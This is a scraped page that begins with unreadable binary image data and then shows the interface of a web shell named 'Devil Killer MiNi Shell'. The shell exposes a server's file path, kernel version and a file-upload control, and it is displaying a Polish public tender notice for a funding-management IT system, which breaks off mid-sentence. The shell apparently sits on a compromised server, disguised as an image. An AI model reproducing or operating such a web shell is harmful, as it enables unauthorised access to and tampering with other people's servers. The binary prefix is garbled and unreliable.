JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240430/0030838301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i wdrożenie systemu do obsługi Podmiotowego Systemu Finansowania przez Operatora – ARR S.A. w Koninie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Agencja Rozwoju Regionalnego S.A. w Koninie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 310508690</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zakładowa 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Konin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-510</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">arr@arrkonin.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.arrkonin.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> KOORDYNOWANIE OPRACOWAŃ I WDRAŻANIE REGIONALNYCH PROGRAMÓW RESTRUKTURYZACYJNYCH ORAZ TRANSFORMACYJNYCH; POZOSTAŁE DORADZTWO W ZAKRESIE PROWADZENIA DZIAŁALNOŚCI GOSPODARCZEJ I ZARZĄDZANIA </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i wdrożenie systemu do obsługi Podmiotowego Systemu Finansowania przez Operatora – ARR S.A. w Koninie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b11bf00a-06da-11ef-9b7e-467806a93518</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00308383</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusz na rzecz Sprawiedliwej Transformacji (FST) z działania 10.01 oraz z Europejskiego Funduszu Społecznego (EFS+) z działania 6.04 w ramach programu Fundusze Europejskie dla Wielkopolski 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b11bf00a-06da-11ef-9b7e-467806a93518 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Rozdział XXI Specyfikacji Warunków Zamówienia - SPOSÓB KOMUNIKACJI, WYJAŚNIENIA TREŚCI SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Rozdział XXXII Specyfikacji Warunków Zamówienia - PRZETWARZANIE DANYCH OSOBOWYCH</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Rozdział XXXII Specyfikacji Warunków Zamówienia - PRZETWARZANIE DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ARR-K/37/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przygotowanie, dostarczenie i wdrożenie systemu informatycznego pozwalającego na obsługę Podmiotowego Systemu Finansowania (PSF) przez spółkę Agencja Rozwoju Regionalnego S.A. w Koninie (ARR), która będzie pełniła rolę Administratora Regionalnego BUR (Operatora) w latach 2024-2028 dla co najmniej 3 (trzech) projektów dotyczących wspierania usług rozwojowych z wykorzystaniem Bazy Usług Rozwojowych (BUR), a także późniejsze świadczenie usługi Serwisu gwarancyjnego, wsparcia autorskiego i wsparcia w konfiguracji nowych projektów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48210000-3 - Pakiety oprogramowania dla sieci</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48220000-6 - Pakiety oprogramowania dla internetu i intranetu</p> <p class="mb-0">48310000-4 - Pakiety oprogramowania do tworzenia dokumentów</p> <p class="mb-0">48420000-8 - Pakiety oprogramowania do zarządzania urządzeniami i zestawy pakietów oprogramowania</p> <p class="mb-0">48780000-9 - Pakiety oprogramowania do zarządzania systemem, przechowywaniem i zawartością</p> <p class="mb-0">48810000-9 - Systemy informacyjne</p> <p class="mb-0">48920000-3 - Pakiety oprogramowania do automatyzacji prac biurowych</p> <p class="mb-0">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</p> <p class="mb-0">72600000-6 - Usługi doradcze i dodatkowe w zakresie sprzętu komputerowego</p> <p class="mb-0">72700000-7 - Usługi w zakresie sieci komputerowej</p> <p class="mb-0">72611000-6 - Usługi w zakresie wsparcia technicznego</p> <p class="mb-0">72200000-7 - Usługi doradcze w zakresie programowania oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1 - Wynagrodzenie brutto (cena):<br/><br/>Cena brutto za realizację przedmiotu zamówienia spośród ofert niepodlegających odrzuceniu. Ocena zostanie dokonana w oparciu o treść formularza ofertowego. <br/><br/>Maksymalna liczba punktów, która może zostać przyznana Wykonawcy w ocenie ww. kryterium wynosi 70 (słownie: siedemdziesiąt). Oferta z najniższą ceną brutto wyrażoną w PLN otrzyma maksimum możliwych punktów w tym kryterium, tj. 70 punktów.<br/><br/>Ocena pozostałych ofert w zakresie przedstawionego wyżej kryterium zostanie dokonana wg następującej zasady:<br/><br/>WC = Cmin / Cb x 70<br/><br/>gdzie:<br/>WC - wartość punktowa oceny,<br/>Cb – wartość brutto ceny oferty badanej,<br/>Cmin – najniższa wartość brutto ceny spośród ofert ważnych.<br/><br/>Kryterium nr 2 – Termin realizacji zamówienia<br/><br/>Maksymalna liczba punktów, która może zostać przyznana Wykonawcy w ocenie ww. kryterium wynosi 30 (słownie: trzydzieści). Ocenie podlegać będzie termin realizacji zamówienia, tj. termin uruchomienia Systemu w wersji produkcyjnej (maksymalny termin określony w OPZ - 120 (słownie: sto dwadzieścia) dni od dnia podpisania umowy). <br/><br/>Liczba punktów za to kryterium zostanie przyznana Wykonawcy zgodnie z poniższym zestawieniem:<br/><br/>poniżej 90 dni - 30 punktów<br/>od 90 do 104 dni - 20 punktów<br/>od 105 do 119 dni - 10 punktów<br/>120 dni - 0 punktów<br/><br/>Ostateczną ocenę punktową każdej z ocenianych ofert stanowić będzie liczba punktów przyznanych w ramach ww. kryteriów. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyskała największą liczbę punktów. Maksymalna liczba punktów, którą Wykonawca może uzyskać to 100 punktów. Zamawiający zaokrągli wyniki oceny ofert do dwóch miejsc po przecinku.<br/><br/>Zamawiający wybiera najkorzystniejszą ofertę spośród ofert nieodrzuconych i Wykonawców niewykluczonych z postępowania, wyłącznie na podstawie kryteriów oceny ofert.<br/><br/>W toku oceny ofert Zamawiający może żądać od Wykonawcy pisemnych wyjaśnień dotyczących treści złożonej oferty.<br/><br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w PZP oraz SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale XVI SWZ, a także spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>4) zdolności technicznej lub zawodowej:<br/>a) Zamawiający wymaga, by Wykonawca wykazał, że w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał lub wykonuje co najmniej 3 (słownie: trzy) dostawy wraz z wdrożeniem systemu informatycznego dedykowanego do obsługi projektów dofinansowywanych i/lub pożyczkowych, każda o wartości co najmniej 200.000,00 zł (słownie: dwieście tysięcy złotych 00/100) brutto,<br/>b) Zamawiający wymaga, by w trakcie realizacji zamówienia Wykonawca dysponował co najmniej 3 (słownie: trzema) osobami zdolnymi do osobistego wykonania zamówienia, które będą realizowały zadania związane z przedmiotem zamówienia składający się z:<br/>i. kierownika projektu, który posiada doświadczenie w koordynowaniu projektów informatycznych dedykowanych do obsługi projektów dofinansowywanych i/lub pożyczkowych, tj. w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert koordynował realizację co najmniej 3 (słownie: trzech) ww. projektów informatycznych;<br/>ii. 2 (słownie: dwóch) specjalistów ds. oprogramowania, z których: <br/> co najmniej 1 (słownie: jeden) posiada doświadczenie w zakresie projektowania, tworzenia i wdrażania oprogramowania webowego (działającego w Internecie) na podstawie specyfikacji wymagań, tj. w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert zrealizował co najmniej 3 (słownie: trzy) prace w zakresie projektowania, tworzenia i wdrażania oprogramowania webowego (działającego w Internecie) na podstawie specyfikacji wymagań,<br/> co najmniej 1 (słownie: jeden) posiada doświadczenie w zakresie projektowania części systemu odpowiedzialnej za integrację z zewnętrznymi systemami informatycznymi, tj. w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert zrealizował co najmniej 3 (słownie: trzy) prace w zakresie projektowania części systemu odpowiedzialnej za integrację z zewnętrznymi systemami informatycznymi,<br/> co najmniej 1 (słownie: jeden) posiada doświadczenie w zakresie projektowania, przechowywania i udostępniania danych przetwarzanych przez system informatyczny, tj. w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert zrealizował co najmniej 3 (słownie: trzy) prace w zakresie projektowania przechowywania i udostępniania danych przetwarzanych przez system informatyczny,<br/> co najmniej 1 (słownie: jeden) posiada doświadczenie w zakresie tworzenia scenariuszy testowych i testowania oprogramowania dedykowanego do obsługi projektów dofinansowywanych i/lub pożyczkowych, tj. w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert zrealizował co najmniej 3 (słownie: trzy) prace w zakresie tworzenia scenariuszy testowych i testowania oprogramowania dedykowanego do obsługi projektów dofinansowywanych i/lub pożyczkowych,<br/> co najmniej 1 (słownie: jeden) posiada doświadczenie w zakresie opracowania dokumentacji dla użytkowników oprogramowania dedykowanego do obsługi projektów dofinansowywanych i/lub pożyczkowych, tj. w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert zrealizował co najmniej 3 (słownie: trzy) prace w zakresie opracowania dokumentacji dla użytkowników oprogramowania dedykowanego do obsługi projektów dofinansowywanych i/lub pożyczkowych.<br/>3. Zamawiający, w odniesieniu do wymaganej zdolności zawodowej lub technicznej opisanej w ust. 2 pkt 4 powyżej informuje, że:<br/>1) jedna praca może spełniać więcej niż jedno z wymagań, o których mowa w ust. 2 pkt 4 lit. b, ii.;<br/>2) jedna osoba może spełniać więcej niż jedno z wymagań, o których mowa w ust. 2 pkt 4 lit. b, ii., przy czym nie może zostać ona wskazana jako osoba posiadająca doświadczenie w więcej niż w 3 (słownie: trzech) obszarach wymienionych w tym postanowieniu;<br/>3) do realizacji zamówienia muszą zostać skierowane osoby wskazane przez Wykonawcę na potwierdzenie spełnienia warunku udziału dotyczącego zdolności technicznej lub zawodowej, o którym mowa w ust. 2 pkt 4 lit. b.<br/>4. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>5. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>6. Zamawiający informuje, że Wykonawca przystępujący do niniejszego postępowania powinien zapoznać się z funkcjonującą w ARR Polityką przeciwdziałania nieprawidłowościom i nadużyciom finansowym oraz unikania konfliktu interesów w spółce prawa handlowego pod firmą Agencja Rozwoju Regionalnego spółka akcyjna w Koninie, stanowiącą Załącznik nr 10 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest dołączyć do oferty aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 3 do SWZ.<br/><br/>Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 powyżej stanowią potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. <br/><br/>Zgodnie z art. 274 ust. 1 PZP, przed wyborem najkorzystniejszej oferty Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 (słownie: pięć) dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z Załącznikiem nr 4 do SWZ,<br/>2) informacji odpowiadającej odpisowi aktualnemu lub pełnemu z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonej nie wcześniej niż 3 (słownie: trzy) miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>3) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – zgodnie z Załącznikiem nr 5 do SWZ,<br/>4) wykazu dostaw, a w przypadku świadczeń okresowych lub ciągłych – wykonywanych, w okresie ostatnich 3 (słownie: trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych - są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 (słownie: trzech) miesięcy – zgodnie z Załącznikiem nr 6 do SWZ,<br/>5) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z Załącznikiem nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca zobowiązany jest dołączyć do oferty aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 3 do SWZ.<br/><br/>Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 powyżej stanowią potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. <br/><br/>Zgodnie z art. 274 ust. 1 PZP, przed wyborem najkorzystniejszej oferty Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 (słownie: pięć) dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z 